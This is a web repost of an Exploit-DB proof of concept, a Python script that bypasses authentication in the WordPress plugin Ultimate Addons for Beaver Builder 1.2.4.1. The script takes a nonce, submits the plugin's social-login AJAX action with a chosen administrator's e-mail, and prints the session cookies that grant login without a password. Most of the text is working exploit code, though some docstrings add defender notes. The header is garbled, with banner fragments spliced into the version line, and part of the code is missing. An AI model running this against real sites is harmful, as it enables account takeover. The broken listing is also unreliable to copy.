
Published on December 31st, 2019 📆 | 2600 Views ⚑


WordPress Ultimate Addons for Beaver Builder 1.2.4.1 – Authentication Bypass



# Exploit Title: WordPress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
# Date: 2019-12-21
# Exploit Authors: Raphael Karger & Nathan Hrncirik
# Vendor Homepage: https://www.ultimatebeaver.com/
# Version: Ultimate Addons for Beaver Builder      >  |_(   )  ||  |  
|______/____|__  /______  /|______  /_______  /__/_ |   __/|____/____/|__||__|  
                /       /        /        /      /|__|                         
Ultimate Addons for Beaver Builder ")[0]
        except Exception as e:
            print("Nonce Error: {}".format(e))

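    def auth_bypass(self):
        """Send the plugin's social-login AJAX request and print the session cookies.

        The request goes to ``/wp-admin/admin-ajax.php`` on the scheme and host
        taken from ``self.page`` and carries four form fields: the action name
        ``uabb-lf-google-submit``, a fixed display name, ``self.email`` and
        ``self.nonce``. No password or identity-provider token is part of the
        request; the only site-specific secret is the nonce, which the
        companion ``get_nonce`` step is expected to have set on ``self.nonce``.
        Per the advisory title, affected plugin versions treat this as a valid
        login (the server-side handling is not visible in this listing).

        Defender notes: POSTs to ``admin-ajax.php`` with this ``action`` value
        from clients that hold no session are the trace this request leaves in
        web-server or WAF logs. Remediation is to update the plugin past the
        affected version (the fixed version is not legible on this page).

        Returns:
            None. Results and errors are printed, never raised.
        """
        try:
            target = urllib.parse.urlparse(self.page)
            endpoint = "{}://{}/wp-admin/admin-ajax.php".format(target.scheme, target.netloc)
            form = {
                "action": "uabb-lf-google-submit",
                "name": "raphaelrocks",
                "email": self.email,
                "nonce": self.nonce,
            }
            # self.sess is presumably a requests.Session created in __init__ -- TODO confirm;
            # any cookies set by the response are kept on it.
            resp = self.sess.post(endpoint, data=form)
            # NOTE(review): HTTP 200 only shows that the endpoint answered. It does not
            # by itself show that a session was issued, so an empty cookie dict below
            # means the site did not accept the request.
            if resp.status_code == 200:
                # The listing had lost the backslash of the newline escape, which
                # printed a stray "n" in front of the JSON.
                print("Exploit Successful, Use the Cookies to Login: \n{}".format(
                    json.dumps(self.sess.cookies.get_dict(), indent=4)
                ))
        except Exception as e:
            # Best-effort PoC: report the failure and return instead of propagating.
            print("Auth Bypass Error: {}".format(e))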

    def begin_exploit(self):
        """Run the two stages in order: nonce lookup, then the login request.

        ``get_nonce`` is called first and is expected to set ``self.nonce``.
        When the nonce is empty or missing, the run stops with a message and
        no request is sent to ``admin-ajax.php``.
        """
        self.get_nonce()
        if not self.nonce:
            # Without the nonce the second stage is skipped entirely.
            print("Failed to Gather Nonce")
            return
        print("Found Nonce: {}".format(self.nonce))
        self.auth_bypass()

if __name__ == "__main__":
    # Command-line entry point: both options are mandatory. The URL is the page
    # that shows the plugin's social login form, and the e-mail identifies the
    # account whose login the check is run against.
    print(banner)
    cli = argparse.ArgumentParser()
    cli.add_argument(
        "-e", "--email",
        dest="email",
        required=True,
        help="Email of Administrator User/Privileged User",
    )
    cli.add_argument(
        "-u", "--url",
        dest="url",
        required=True,
        help="URL With Social Media Login Form",
    )
    opts = cli.parse_args()
    # The constructor takes the page URL first, then the e-mail address.
    exploit(opts.url, opts.email).begin_exploit()
            





https://www.exploit-db.com/exploits/47832
